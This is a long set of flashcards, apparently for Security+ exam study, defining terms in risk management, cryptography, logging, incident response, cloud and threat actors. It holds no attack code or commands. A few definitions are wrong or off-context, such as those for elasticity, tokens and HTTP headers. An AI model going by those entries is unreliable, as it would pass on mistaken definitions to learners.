Data embedded into websites as part of the code of the website but is often invisible to everyday users; includes metatags, headers, cookies, and other information that help with search engine optimization, website functionality, advertising, and tracking, or that may support specific functionality.
7 common impacts of vulnerabilities
Data loss, data breaches, data exfiltration, identity theft, financial impact, reputation, availability loss
Five common privacy-enhancing technologies
Data minimization, data masking, tokenization, anonymization, pseudo-anonymization.
Email metadata
Data stored in the email about the email. Often this data is not even viewable in the email client application used to create the email. The amount of email metadata available for a particular email varies greatly depending on the email system.
Data in transit/motion
Data that is moving between computing nodes over a data network such as the Internet.
Data at rest
Data that is stored on electronic media.
East-west traffic
Design paradigm accounting for the fact that data center traffic between servers is greater than that passing in and out (north-south); traffic that moves laterally between servers
Cloud controls matrix
Developed by the CSA as a reference document designed to help organizations understand the appropriate use of cloud security controls and map those controls to various regulatory standards.
Sensors
Devices that collect input from the environment and provide information that the CPU can respond to.
Fire suppression systems
Devices that help with resiliency by reducing the potential for disastrous fires
Federation
Different computing entities adhering to a certain standard of operations in a collective manner to facilitate communication.
7 types of threat vectors
Direct access, wireless, email, supply chain, social media, removable media, cloud
Port Security
Disabling unused application/service ports to reduce the number of threat vectors; a Cisco switch feature that limits the number of MAC addresses allowed to communicate through a particular port
Swap/page file
Disk space used to supplement physical memory; space on a hard drive used as a temporary location to store information when random access memory (RAM) is fully utilized.
RAID 6
Disk striping with double parity. Like RAID 5, but with more parity data, which is stored on another drive.
Load balancing
Distributing a computing or networking workload across multiple systems to avoid congestion and slow performance.
Separation of duties
Dividing responsibilities between two or more people to limit fraud and promote accuracy of accounting records.
Skimming
Double-swiping a credit card in a legitimate terminal or covertly swiping a credit card in a small, hidden, handheld card reader that records credit card data for later use
Sideloading
Downloading an app from an unofficial third-party website.
Seven authentication protocols
EAP, PEAP, EAP-FAST, EAP-TLS, EAP-TTLS, IEEE 802.1X, RADIUS
Social media
Electronic media that allows people with similar interests to participate in a social network; a common element of influence campaigns
Four common types of metadata
Email, mobile, web, file
Horizontal scaling
Employs multiple computers to share the workload; uses smaller systems or devices but adds more of them
Homomorphic encryption
Enables processing of encrypted data without the need to decrypt the data. It allows the cloud customer to upload data to a cloud service provider for processing without the requirement to decipher the data first.
Three main steps of certificate generation and destruction
Enrollment, verification, revocation
Next steps to take in notifying others of a breach
Escalation to key personnel involved in a cybersecurity incident response plan, and making a disclosure/notification to the public that aligns with the state's data breach laws.
SSL/TLS Inspection
Examines outgoing SSL/TLS traffic. Relies on trust: the browser trusts the devices it connects to across the network and is able to perform encryption end-to-end; if that trust is broken, nothing will work.
Dynamic Code Analysis
Examining code after the source code is compiled and when all components are integrated and running; the analysis of the code as it is running.
Tabletop exercises
Exercises that simulate an emergency situation but in an informal and stress-free environment; team members are given a scenario and are asked questions about how they would respond, what issues might arise, and what they would need to do to accomplish the tasks they are assigned in the IR plan.
Stakeholder management plan
Explains how stakeholders will be identified along with their level of interest in the project and influence over the project. This is closely tied to the communications plan since stakeholders will need varying levels and frequency of information. Many SMPs will help with prioritization of which stakeholders will receive communications, what support they may need, and how they will be provided, with options to offer input or otherwise interact with the IR process, communications and support staff, or others involved in the response process.
Six types of security risks
External, internal, legacy systems, multiparty, IP theft, software compliance/licensing
ICS/SCADA systems are common in what environments?
Facilities management, industrial, manufacturing, energy, logistics
Efficacy rates
False acceptance rate (FAR), false rejection rate (FRR), crossover error rate (CER)
Certificate attributes
Fields in an X.509 digital certificate that are used when parties negotiate a secure connection.
What kind of attack is commonly executed in PowerShell environments?
Fileless malware attacks, where PowerShell scripts are executed locally once a browser or plug-in is compromised
System logs
Files that store a variety of information about system events, including device changes, device drivers, and system changes; logs the events such as a system shutdown and driver failures
Application logs
Files that store actions performed by the application on the system. Often track items such as attempts to access the application, errors generated from the application, etc.; logs the events for the operating system and third-party applications.
VoIP/Call manager logs/SIP logs
Files that store information about calls that were placed as well as other events on a VoIP system.
Network/Security device logs
Files that store information about routers and switches with configuration changes, traffic information, network flows, and data captured by packet analyzers like Wireshark.
Authentication logs
Files that store information determining when an account was logged into and may also show privilege use, login system or location, incorrect password attempts, and other details of logins and usage that can be correlated to intrusions and misuse.
DNS logs
Files that store information on DNS queries to the server, including the source IP address of the request and the domain name of the destination IP address; these logs can show attackers gathering information, provide information that shows what systems may be compromised based on their DNS requests, and show whether internal users are misusing organizational resources.
Web logs
Files that store information such as requests to a web server and related events; these logs can help track what was accessed, when it was accessed, and what IP address sent the request; since requests are logged, these can also help identify attacks, including SQL injection and other web server and web application-specific attacks.
Dump files
Files that store information that shows the state of memory and the system at the time of a crash. If the crash occurred because of an attacker or exploit, or if malware or attack tools were on the system, these files may contain those artifacts.
Examples of biometric authentication methods
Fingerprint scan, retina scan, iris scan, facial scan, voice recognition, vein scan, gait analysis
Configuration changes to consider for remediation or containment
Firewall rule changes, MDM changes, DLP tool changes, content/URL filtering capabilities, updating or revoking certificates
Next-generation firewall
Firewall technology based on packet contents as opposed to simple address and port information.
Custom firmware
Firmware that is written by users to run on their own mobile devices.
WinHex
Forensics tool for Windows that allows collection and inspection of binary code in disk and memory images.
On-path attack
Formerly known as a man in the middle attack; occurs when the attacker redirects the victim's traffic without their knowledge.
Two types of proxy servers
Forward and reverse
Four types of backups
Full, incremental, differential, snapshot
Regulations that affect risk posture
GDPR, Sarbanes-Oxley Act (SOX), Health Insurance Portability Accountability Act (HIPAA), Payment Card Industry (PCI) and Data Security Standard (DSS), FERPA, GLBA, data breach notification laws
Quality Assurance (QA)
Gathering and evaluating information about the services provided as well as the results achieved and comparing this information with an accepted standard
Legacy systems risks
General term for risks associated with using a legacy system. These outdated systems often do not receive security updates, and cybersecurity professionals must take extraordinary measures to protect them against unpatchable vulnerabilities.
Publishers of benchmarks/secure configuration guides
Government agencies, vendors, industry groups
Hacktivists
Hackers who are driven by a cause like social change, political agendas, or terrorism
Self-Encrypting Drive (SED)
Hard drives that encrypt all of the contents held within using encryption keys that are maintained independently from the CPU of the housing computer.
Load balancers
Hardware devices that are designed to split a particular network load across multiple servers; these make multiple systems or services appear to be a single resource
USB data blocker
Hardware plug to prevent malicious data transfer when a device is plugged into a USB charging point.
Two major categories of scalability
Horizontal and vertical
(Incident response) simulations
IR exercises that can include a variety of types of events, such as individual functions or elements of the plan, or only target specific parts of an organization. They can also be done at full scale, involving the entire organization in the exercise.
Four crucial ISO standards for cybersecurity
ISO 27001, 27002, 27701, 31000
Vein Recognition
Identifying uniqueness through blood vessels.
Transport mode
In IPSec, an encryption method in which only a packet's IP data is encrypted, not the IP headers themselves; this method allows intermediate nodes to read the source and destination addresses.
Tunnel mode
In IPSec, an encryption method in which the entire IP packet is encrypted and inserted as the payload in another IP packet. This requires other systems at the beginning and end of the tunnel to act as proxies to send and receive the encrypted packets and then transmit the packets to their ultimate destination.
SIEM Sensitivity
In a SIEM, the quality of being quick to detect or respond to slight changes, signals, or influences (important data); this can be controlled/limited by setting thresholds, filter rules, and other methods of managing this quality of the SIEM.
What efforts should be made with vendors in regards to NDAs?
In addition to employees, vendors may have access to sensitive information about your organization. Vendor agreements should also include NDA terms, and organizations should ensure that vendors ask their own employees to sign NDAs if they will have access to your sensitive information.
Transit gateway
In cloud computing, a virtual router deployed to facilitate connections between VPC subnets and VPN gateways; a network hub that acts as a regional virtual router to connect networks.
Time offset
In forensics, identifying whether a time zone offset has been applied to a file's time stamp; the amount of time added to or subtracted from Coordinated Universal Time (UTC) to arrive at the current local time.
Corporate-owned
In this traditional deployment model, the organization purchases devices and issues them to employees.
Intelligence fusion
In threat hunting, using sources of threat intelligence data to automate detection of adversary IoCs and TTPs.
Personally Identifiable Information (PII)
Includes any information that uniquely identifies an individual person, including customers, employees, and third parties.
Data steward
Individuals who carry out the intent of the data controller and are delegated responsibility from the controller.
Data owner
Individuals, normally managers or directors, who have responsibility for the integrity, accurate reporting and use of computerized data.
Script Kiddies
Inexperienced, usually young hackers who use programs that others have developed to attack computer and network systems and deface Web sites.
Government information
Information maintained by the organization that may be subject to other rules, including the data classification requirements of the US government.
Documents organizations commonly include in their information security library
Information security policy, acceptable use policy, data governance policy, data classification policy, data retention policy, credential management policy, password policy, continuous monitoring policy, code of conduct/ethics, change management/change control policies, asset management policies
Unclassified
Information that does not meet the standards for classification under the other categories; information in this category is still not publicly released without authorization; a US government "classification."
Financial information
Information that includes any personal finance records maintained by the organization.
Protected Health Information (PHI)
Information that includes medical records maintained by healthcare providers and other organizations that are subject to HIPAA.
Closed-Source (Proprietary) Intelligence
Information that is obtained through private sources and disseminated through paid-for subscription or membership services.
Open-Source Intelligence (OSINT)
Information that is readily available to the public and doesn't require any type of malicious activity to obtain.
Secret
Information that requires a substantial degree of protection. The unauthorized disclosure of this information could reasonably be expected to cause serious damage to national security; a US government classification.
Confidential
Information that requires some protection. The unauthorized disclosure of this information could reasonably be expected to cause identifiable damage to national security; a US government classification.
Top secret
Information that requires the highest degree of protection. The unauthorized disclosure of this information could reasonably be expected to cause exceptionally grave damage to national security; a US government classification.
Three different states of risk
Inherent risk, residual risk, risk appetite
Fuzzing
Injection of randomized data into a software program in an attempt to find system failures, memory leaks, error handling issues, and improper input validation
Two types of NIDS sensors
Inline and passive
client-side execution and validation
Input validation that is performed by the user's web browser.
Benchmarks/secure configuration guides
Instructions that have been developed over years that are designed to give organizations the best and most secure configurations for a particular system; get down into the nitty-gritty details of securely operating commonly used systems.
Cybersecurity insurance
Insurance that protects an organization by monetary compensation in the event of a successful cybersecurity attack.
4 sources for threat hunters
Intelligence fusion, threat feeds, advisories and bulletins, maneuver
Disaster types to have documented in a DRP
Internal and external risks from both environmental and man-made disasters.
4 attributes of threat actors
Internal/external, level of sophistication/capability, resources/funding, intent/motivation
Identity fraud
Involves the unauthorized use of another person's personal data for illegal and/or financial benefit
Why is PowerShell so easy to leverage for attacks?
It allows remote and local execution, network access, and many other capabilities; in addition, it is available by default on Windows systems and is often not carefully monitored
Four issues with symmetric key cryptography
Key distribution is a major problem; does not implement nonrepudiation; algorithm is not scalable; key must be regenerated often
Examples of documentation/evidence produced by digital forensics
Legal holds, video, admissibility, chain of custody, timelines of sequence of events, tags, reports, event logs, interviews
Two factors used to evaluate risk
Likelihood of occurrence and magnitude of the impact
Certificate chaining
Linking several certificates together to establish trust between all the certificates involved; the use of a series of intermediate CAs.
grep (command)
Linux command for searching and filtering input. This can be used as a file search tool when combined with ls.
logger (command)
Linux utility that writes data to the system log.
Security logs
Logs the events such as successful and unsuccessful user logins to the system; logs that are considered the primary source of log data.
Three major attack frameworks
MITRE ATT&CK, Diamond Model of Intrusion Analysis, Lockheed Martin's Cyber Kill chain
Commonly used agreements between organizations and third parties
MSA, SLA, MOU, BPAs
Four key metrics used in a BIA
MTBF, MTTR, RTO, RPO
What kind of attack is commonly executed in VBA environments?
Macro viruses
Continuous monitoring
Maintaining ongoing awareness to support organizational risk decisions.
Unauthorized hackers
Malicious hackers that violate security for personal gain (Black Hat)
Cryptomalware
Malware that encrypts the user's data; also called ransomware.
Seven examples of specialized embedded systems
Medical systems, smart meters, vehicles/aircraft, drones/AVs, VoIP systems, MFPs, surveillance systems
File metadata
Metadata that describes interesting properties about the files that are not related to the main content of the file; information about a file that can include the creation, modified and last access dates, and also the user who created the file
Edge computing
Method of optimizing cloud computing systems by performing some data processing on a set of linked servers at the edge of the network, near the source of the data.
RAID 10
Mirroring and striping data; a combination of RAID 1 and RAID 0; data is striped across two or more drives and then mirrored to the same number of drives
RAID 1
Mirroring data; all data is copied exactly to another drive or drives
Rich Communication Services (RCS)
Mobile device communication which can convert a texting app into a live chat platform and supports pictures, videos, location, stickers, and emojis.
Two types of security camera capabilities
Motion recognition and object detection
Six security constraints of embedded systems
Much lower computational/electrical power; may not connect to a network/ineffective range; inability to patch; authentication is likely impossible; can be effectively very high cost; may rely on implied trust
RADIUS Federation
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations; should be implemented if all the organizations use the native 802.1x client on their mobile devices.
Common name
Name that clearly describes the certificate owner (e.g., "certmike.com")
Subject alternative names
Names that allow you to specify additional items (IP addresses, domain names, and so on) to be protected by the single certificate
Two types of radio frequency systems
Narrowband and wideband
The three types of DDoS attacks
Network, application, and operational technology (OT)
Thin client
Networking system whereby client computers rely on servers to perform their processing tasks.
Extensible Authentication Protocol (EAP)
Not an authentication mechanism in itself but instead defines message formats. 802.1X would be the authentication mechanism and defines how this is encapsulated within messages; a framework for transporting authentication protocols that defines the format of the messages.
Race conditions
Occur when the security of a code segment depends upon the sequence of events occurring within the system
Three main methods used to exchange secret symmetric keys
Offline distribution, public key encryption, Diffie-Hellman
Virtual machine
One or more logical machines created within one physical machine; the apparent machine that the operating system presents to the user, achieved by hiding the complexities of the hardware behind layers of operating system software.
Continuous validation
Ongoing approvals of code.
7 common weak network configurations
Open permissions, unsecure root accounts, errors, weak encryption, unsecure protocols, default settings, open ports and services
10 sources of threat intelligence
Open-Source Intelligence (OSINT), closed/proprietary, vulnerability databases, public/private information-sharing centers, dark web, Indicators of Compromise (IoC), Automated Indicator Sharing (AIS), predictive analysis, threat maps, file/code repositories
Examples of common platforms/vendor-specific guides that benchmarks are written about
Operating systems, web servers, application servers, network infrastructure devices
Mission essential functions
Operations that are core to the success of the business. (Revenue generating applications, billing applications, etc.); refers to functions that need to be immediately functional at an alternate site until normal operations can be restored.
How is asymmetric key encryption used?
Opposite and related keys must be used in tandem to encrypt and decrypt. If the public key encrypts a message, then only the corresponding private key can decrypt it, and vice versa
Data in processing
Organization of data for the purpose of producing desired information; involves recording, classifying, sorting, summarizing, calculating, disseminating and storing data.
Vulnerability scan output
Output that provides information as to the systems that are running, any additional services that are listening on the network, and what the known vulnerabilities are against each of those.
Firmware OTA updates
Over-the-air updates for mobile device firmware that keep them up to date. These are typically downloaded to the device from the internet and applied to update the device.
Types of information that organizations should store in their inventory
PII, PHI, financial information, government information
Potentially Unwanted Programs
PUP; Programs that may not be wanted by the user but are not as dangerous as other types of malware
Service Level Agreement (SLA)
Part of a service contract where the service expectations are formally defined; written contracts that specify the conditions of service that will be provided by the vendor and the remedies available to the customer if the vendor fails to meet the SLA.
Third-party updates
Patch updates for application and utility software.
Credential policies should be established for what groups/personnel?
Personnel (employees), third-party contractors, devices, service accounts, administrator/root accounts
Vishing
Phishing attacks committed using telephone calls or VoIP systems.
Smishing
Phishing attacks committed using text messages (SMS).
Retention policies
Policies that identify how long data is retained and how it will be disposed of; an important component for incident responders since it may determine how long the organization keeps incident data, how long logs will be available, and what data is likely to have been retained and thus may have been exposed if a system or data store is compromised or exposed.
Conditional access
Policies that, at their simplest, can be defined as if-then statements: if a user wants to access a resource, then they must complete an action.
Bollard
Posts or other obstacles that prevent vehicles from moving through an area
Six steps in the incident response cycle
Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned
Six security control types
Preventive controls, detective controls, corrective controls, deterrent controls, physical controls, compensating controls
Principle of Scarcity
Principle (of social engineering) that makes something look more desirable because it may be the last one available
Principle of Trust
Principle (of social engineering) that relies on a connection with the individual they are targeting
Principle of Urgency
Principle (of social engineering) that relies on creating a feeling that the action must be taken quickly due to some reason or reasons
Technical controls
Procedural mechanisms that enforce confidentiality, integrity, and availability in the digital space. Examples include firewall rules, access control lists, intrusion prevention systems, and encryption.
Managerial controls
Procedural mechanisms that focus on the mechanics of the risk management process; examples include periodic risk assessments, security planning exercises, and the incorporation of security into the organization's change management, service acquisition, and project management practices.
Operational controls
Procedural mechanisms that include the processes that we put in place to manage technology in a secure manner. These include user access reviews, log monitoring, and vulnerability management.
Encryption
Process of converting readable data into unreadable characters to prevent unauthorized access.
Pseudo-anonymization
Process of replacing PII with simulated identifiers. Techniques include de-identification and data obfuscation.
Open source software
Program code made publicly available for free; it can be copied, distributed, or changed without stringent copyright protections.
Trojans
Programs that look useful, but actually cause damage to your computer
Public cloud
Promotes massive, global, and industrywide applications offered to the general public
General Data Protection Regulation (GDPR)
Proposed set of regulations adopted by the European Union to protect EU residents from clandestine tracking and unauthorized personal data usage.
Nonrepudiation
Provides assurance to the recipient that the message was originated by the sender and not someone masquerading as the sender
Least privilege
Providing only the minimum amount of privileges necessary to perform a job or function; a principle that users be granted the privilege for some activity only if there is a justifiable need to grant this authorization.
Fog computing
Provisioning processing resource between the network edge of IoT devices and the data center to reduce latency.
Six information classification levels commonly used in businesses
Public, private, sensitive, confidential, critical, proprietary
Two analysis methodologies for risk assessments
Quantitative risk assessment and qualitative risk assessment
Remote Access Trojan
RAT; a type of malware that allows covert surveillance, a backdoor for administrative control and unfettered and unauthorized remote access to a victim's machine.
Two most common asymmetric cryptography algorithms
RSA and Elliptic curve
Wideband
Radio systems that support higher data rate transmissions (faster communication)
Three examples of embedded systems
Raspberry Pi, FPGA, Arduino
Seven stages of the Cyber Kill chain
Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objective
4 types of penetration testing teams
Red, Blue, White, Purple
Offsite storage
Refers to an environmentally-controlled facility away from the computer/data center where paper copies or backup media are securely kept; can be owned by a company or managed by a third party service, like Iron Mountain.
Employee Onboarding
Refers to the tasks associated with hiring a new employee
Type 1 SOC report
Report that includes management's assertion and the auditor's opinion on the organization's effective design of controls.
Four biggest organizational consequences of privacy and data breaches
Reputational damage, identity theft, fines, IP theft
Host-based intrusion prevention system
Restricts unauthorized services and applications from running on the host machine; blocks known intrusion signatures
Three nonpersistent response controls
Revert to known state, last known-good configuration, live boot media
Five ways to harden host/application security solutions
Review open ports and services, registry, disk encryption, OS updates/boot security, patch management
Four types of risk management strategies
Risk acceptance, risk avoidance, risk transference, risk mitigation
Risk severity formula
Risk severity = Likelihood x Impact
Purchasing cybersecurity insurance falls under which risk management strategy?
Risk transference
Multiparty risks
Risks that impact more than one organization; example is a power outage to a city block, because it affects all of the buildings on that block, or the compromise of an SaaS provider's database, which affects many different customers of the SaaS provider.
External risks
Risks that originate from a source outside the organization; an extremely broad category, including cybersecurity adversaries, malicious code, and natural disasters, among many other types.
Internal risks
Risks that originate from within the organization; includes malicious insiders, mistakes made by authorized users, equipment failures, and similar risks.
Robot sentries
Robots used to patrol the perimeter of a secure area.
Regulatory requirements
Rules or laws that regulate conduct and that the enterprise must obey to become compliant.
Two most common types of hash functions
SHA and MD5
Three categories of SOC assessment
SOC 1 engagements, SOC 2 engagements, SOC 3 engagements
The two most common ways of accessing monitoring data
SPAN or port tap
4 examples of protocol-based network DDoS attacks
SYN floods, Ping of Death, Smurf attack, Christmas Tree attack
Credentialed Scan
Scan in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check, looking for problems that cannot be seen from the network.
Non-credentialed scan
Scan that might be used in a black box or blind test when you have no knowledge of any system accounts; scans from the outside with no access or authentication.
Intrusive scan
Scans that combine verification of actual vulnerabilities by trying to exploit the vulnerability.
Application scan
Searches for known exploits within a piece of software.
Web application scan
Searches for known exploits within web applications.
War driving
Searching for wireless signals from an automobile or on foot using a portable computing device.
Gamification
Selective use of game design and game mechanics to drive employee engagement in non-gaming business scenarios.
Examples of IoT devices
Sensors, building and facility automation devices, wearables, smart devices (like appliances, cars)
Six common components of a SIEM dashboard
Sensors, sensitivity, trends, alerts, correlation/analysis, rules
Community cloud
Serves a specific community with common business models, security requirements, and compliance considerations; example would be health care systems
Public/private information-sharing centers
Sharing of data and intelligence whether public or private with other companies and people who "need to know". Typically consists of organizations with extensive resources and many times in the same market (such as fintech) and are working to help each other out and make sure everyone stays safe -- even though they're competitors, they have the same goal of protecting each other from threat actors and threats.
Syslog
Short for system logging protocol; a standard for message logging. It allows separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them; used to send system log or event messages to a specific server, called a syslog server. It is primarily used to collect various device logs from several different machines in a central location for monitoring and review.
Four attributes that NIDS/NIPS examines to determine whether network traffic is safe or not
Signature-based, Heuristic/behavior, Anomaly, Inline/Passive
Checksums
Simple method used in symmetric key cryptography to ensure data integrity; a data transmission control that uses a hash of a file to verify accuracy
Six factors to consider before installing/configuring wireless networks
Site surveys, heat maps, Wi-Fi analyzers, channel overlaps, WAP placement, controller and access point security
Two types of VPNs
Site-to-Site and Remote Access.
Tokens
Small electronic devices that change user passwords automatically
Influence campaigns
Social engineering attacks that attempt to guide, adjust, or change public opinion, often waged by nation-states against their real or perceived foreign enemies
Password crackers
Software programs used to identify an unknown or forgotten password
Network access control
Software that controls access to the network by not allowing computers to access network resources unless they meet certain predefined security requirements.
Proprietary software
Software that has been developed by a company and has restrictions on its use, copying, and modification.
Antivirus
Software that is specifically designed to detect viruses and protect a computer and files from harm
Anti-malware
Software that prevents attacks by a wide range of destructive, malicious, or intrusive programs
Voice recognition technology
Software that recognizes the words being said by the person dictating and converts speech to text; differs from speech recognition because voice recognition "learns" the voice of the dictator and is therefore more accurate.
sn1per
Software utility designed for penetration testing reporting and evidence gathering that can also run automated test suites.
Data Loss Prevention
Software which works like antivirus programs in reverse, blocking outgoing messages that contain key words or phrases associated with intellectual property or other sensitive data the organization wants to protect
Host-based intrusion detection system
Software-based application that runs on a local host computer that can detect an attack as it occurs
Broadcast storm prevention
Solutions for a particular issue that include avoiding physical cable loops among switches, using spanning tree protocol (STP) on switches, and implementing port security.
Three factors of MFA
Something you know, something you have, something you are
Four attributes of MFA
Somewhere you are, something you can do, something you exhibit, someone you know
SPIM
Spam over Instant Messaging; Spam that is delivered through instant messaging.
Role-based training
Specialized training that is customized to the specific role that an employee holds in the organization.
One of the most common type of fire suppression systems
Sprinklers
Playbooks
Step-by-step guides intended to help IR teams take the right actions in a given scenario; a set of procedures detailing the steps to take when an event has been detected.
Walk-throughs
Step-by-step reviews of procedures or program logic to find incorrect logic, errors, omissions, or other problems; this exercise can help ensure that team members know their roles as well as the IR process, and that the tools, access, and other items needed to respond are available and accessible to them.
RAID 5
Striping data with parity; Data is striped across drives, with one drive used for parity (checksum) of the data. Parity is spread across drives as well as data
RAID 0
Striping data; data is spread across all drives in the array
The two primary types of nonmathematical cryptography (or ciphering methods)
Substitution and transposition
DHCP snooping
Switch process that monitors DHCP traffic, filtering out DHCP messages from untrusted sources. Typically used to block attacks that use a rogue DHCP server.
The two main types of cryptosystems that enforce confidentiality
Symmetric and asymmetric
Fake telemetry
Synthetic network traffic that resembles genuine communications, delivered at an appropriate volume to make honeynets and honeypots look real.
2 specific vendor management risks
System integration, lack of vendor support
Common types of SIEM log files
System logs, Application logs, Security logs, Vulnerability scan output, Network logs
RFID
System of tags which contain data that can be read from a distance using radio waves.
Automated Indicator Sharing (AIS)
System that enables the sharing of attack indicators, at machine speed, between the US government and the private sector as soon as the threat is verified
Asymmetric cryptosystem
System that uses individual combinations of public and private keys for each user of the system
Symmetric cryptosystem
System where encryption key and decryption key are the same; use a shared secret key available to all users of the cryptosystem
Generator
Systems that are used to provide power for longer outages
Single point of failure
Systems, devices, or other components that, if they fail, would cause an outage; a component or entity in a system which, if it no longer functions, would adversely affect the entire system.
Examples of authentication technologies
TOTP, HMAC-based OTP, SMS, token key, static codes, authentication applications, push notifications, phone call
Three major types of exercises that IRTs use to prepare
Tabletop exercises, Walk-throughs, simulations
Common choices for backup media
Tape, disk, optical media, flash media
Three categories of security control
Technical controls, managerial controls, operational controls
Adversarial artificial intelligence (AI)
Techniques such as machine learning used to solve a variety of problems and challenges used by an adversary.
Privileged Access Management (PAM)
Technologies that help organizations provide secured privileged access to critical assets and meet compliance requirements by securing, managing and monitoring privileged accounts and access.
Closed-circuit television
Television that displays what the camera is seeing on a screen
State actors
Term used to describe Nation-States when they interact on the world stage implementing their foreign policies.
Elasticity
The ability of a material to bounce back after being disturbed
How digital forensics plays a role in both strategic intelligence and counterintelligence efforts
The ability to analyze adversary actions and technology, including components and behaviors of APT tools and processes, has become a key tool in the arsenal for national defense and intelligence groups. At the same time, forensic capabilities can be used for intelligence operations when systems and devices are recovered or acquired, allowing forensic practitioners to recover data and provide it for analysis by intelligence organizations.
Nonpersistence
The ability to have systems or services that are spun up and shut down as needed
(Certificate) verification
The act of checking the CA's digital signature using the CA's public key; performed when you receive a digital certificate from someone with whom you want to communicate.
Dumpster diving
The act of digging through trash receptacles to find information that can be useful in an attack.
Isolation
The act of moving a system into a protected space or network where it can be kept away from other systems.
Pivoting
The act of moving to a new location in a network and beginning the attack process over again, performing scans to see machines that weren't visible before.
(Certificate) revocation
The act of revoking a certificate (making it invalid)
Four strengths of asymmetric key cryptography
The addition of new users requires the generation of only one public-private key pair; users can be removed far more easily; key regeneration is required only when a user's private key is compromised; can provide integrity, authentication, and nonrepudiation; key distribution is a simple process; no preexisting communication link needs to exist
Annualized Loss Expectancy (ALE)
The amount of damage expected from a risk each year; calculated by multiplying the SLE and the ARO.
Recovery Point Objective (RPO)
The amount of data that the organization can tolerate losing during an outage.
Single Loss Expectancy (SLE)
The amount of financial damage expected each time a risk materializes; calculated by multiplying the AV by the EF.
Recovery Time Objective (RTO)
The amount of time that the organization can tolerate a system being down before it is repaired.
Network vulnerability scanner
The application of vulnerability scanning to network devices to search for vulnerabilities at the network level.
Steganography
The art of using cryptographic techniques to embed secret messages within another file; can be done with audio, video, or images
Site risk assessment
The assessment of all risks and hazards that could happen at a particular site.
Extensible Authentication Protocol-TLS
The authentication protocol most commonly deployed on WPA2-Enterprise networks to enable the use of X.509 digital certificates for authentication; provides for certificate-based and mutual authentication of the client and the network.
Mean Time to Repair (MTTR)
The average amount of time to restore a system to its normal operating state after a failure.
SIEM Alerts
The capability (quality) of the SIEM dashboard to analyze log files and post alerts when certain information appears in the log files; the primary communication in the SIEM that visualizes raw data, log info, and identifies security events.
SIEM Trends
The capability (quality) of the SIEM dashboard to analyze patterns in hardware breakdown and performance issues, so that they can predict when maintenance may need to happen in the future. There are separate categories of events, such as application, system, and security events.
Scalability
The capacity for the system to change in size and scale to meet new demands
Why might a certificate be revoked?
The certificate was compromised (owner accidentally gave away the private key); the certificate was erroneously issued (CA mistakenly issued a certificate without proper verification); the details of the certificate changed; the security association changed (subject is no longer employed by the organization sponsoring the certificate)
Services integration and Management (SIAM)
The connection of infrastructure and software elements to provide specific services to a business entity; many different service providers working together in a single-business IT organization
Site resiliency
The considerations that can be connected to the idea of restoration sites and their availability
HTML5
The current version of the HTML standard, which can be used as an alternative to Adobe Flash media
Information life cycle
The cycle of gathering, recording, processing, storing, sharing, transmitting, retrieving, and deleting information.
Blue Team
The defensive team in a penetration test or incident response exercise.
Disaster Recovery Planning (DRP)
The discipline of developing plans to recover operations as quickly as possible in the face of a disaster.
Data controller
The entities who determine the reasons for processing personal information and direct the methods of processing that data; a term used primarily in European law and it serves as a substitute for the term data owner to avoid a presumption that anyone who collects data has an ownership interest in that data.
Production environment
The environment for the actual system operation. It includes hardware and software configurations, system utilities, and communications resources. Also called the operational environment.
Cryptocurrency
The first major application of the blockchain
HTTP headers
The first printing line of output in a web application that tells your web browser how to interpret the data that follows it
Reconnaissance
The gathering of information about a target, whether that is an organization, individual, or something else
Key management
The generation, storage, distribution, deletion, archiving, and application of keys in accordance with a security policy.
Redundancy
The inclusion of extra components so that a system can continue to work even if individual components fail, for example by having more than one path between any two connected devices in a network.
Shadow IT
The information systems and solutions built and deployed by departments other than the information systems department. In many cases, the information systems department may not even be aware of these efforts.
Cuckoo
The leading open source automated malware analysis system.
Discretionary Access Control (DAC)
The least restrictive access control model in which the owner has total control over any object that he/she owns along with the programs that are associated with those objects.
Attestation
The lending of credibility to assertions made by a third party
Risk appetite
The level of risk that an organization is willing to accept as a cost of doing business.
False acceptance rate
The measure of the likelihood that the access system will wrongly accept an access attempt, i.e., will allow an unauthorized user access.
Data sanitization
The method used to repeatedly delete and overwrite any traces or bits of sensitive data that may remain on a device after data wiping has been done.
Asset value (AV)
The monetary value of a company-owned product, usually determined using the cost to acquire an asset, replace an asset, or the depreciated cost of an asset.
RSA
The most common asymmetric cryptography algorithm.
Digital encoding rules
The most common binary format of digital certificates. These are normally stored in files with .DER, .CRT, or .CER extensions.
Domain validation certificates
The simplest and most common certificate issued by a CA; for this, the CA simply verifies that the certificate subject has control of the domain name
Annualized Rate of Occurrence (ARO)
The number of times the risk is expected each year; expressed in a decimal format.
Password Authentication Protocol (PAP)
The oldest and most basic form of authentication and also the least safe because it sends all passwords in cleartext.
Tor
The onion router; a mechanism for anonymously routing traffic across the Internet using encryption and a set of relay nodes
Runbooks
The operational procedures guides that organizations use to perform actions; simplify the decision process for common operations that may support incident response, and they can help guide and build automation for tasks like communications, malware removal, or scanning.
Revert to known state
The option of restoring a device to a previous secure condition; also possible by using snapshots in a virtualization environment or other tools that track changes
Footprinting
The organized research and investigation of Internet addresses owned or controlled by a target organization.
Root certificate
The original digital certificate issued by a Certification Authority.
Inherent risk
The original level of risk that exists before implementing any controls.
Domain reputation
The overall "health" of your branded domain as interpreted by mailbox providers.
False rejection rate
The percentage of times that the system fails to recognize an authorized person and rejects that person as unauthorized.
Data Protection Officer
The person in charge of privacy/data protection in the EU under GDPR; GDPR requires that every data controller designate someone in this position and grant that individual the autonomy to carry out their responsibilities without undue oversight.
Recovery
The phase of the IRC that produces a restoration to normal, which is the heart of this phase. It may mean bringing systems or services back online or other actions that are part of a return to operations. This phase requires that eradication be successful, but it also involves implementing fixes to ensure that whatever security weakness, flaw, or action that allowed the incident to occur has been remediated to prevent the event from immediately reoccurring.
Lessons learned
The phase of the IRC that ensures that organizations improve and do not make the same mistakes again. It may be as simple as patching systems or as complex as needing to redesign permission structures and operational procedures. These are then used to inform the preparation process, and the cycle continues.
Eradication
The phase of the IRC that involves removing the artifacts associated with the incident. In many cases, it will involve rebuilding or restoring systems and applications from backups rather than simply removing tools from a system since proving that a system has been fully cleaned can be very difficult.
Identification
The phase of the IRC that involves reviewing events to identify incidents. You must pay attention to IoCs, use log analysis and security monitoring capabilities, and have a comprehensive awareness and reporting program for your staff.
Preparation
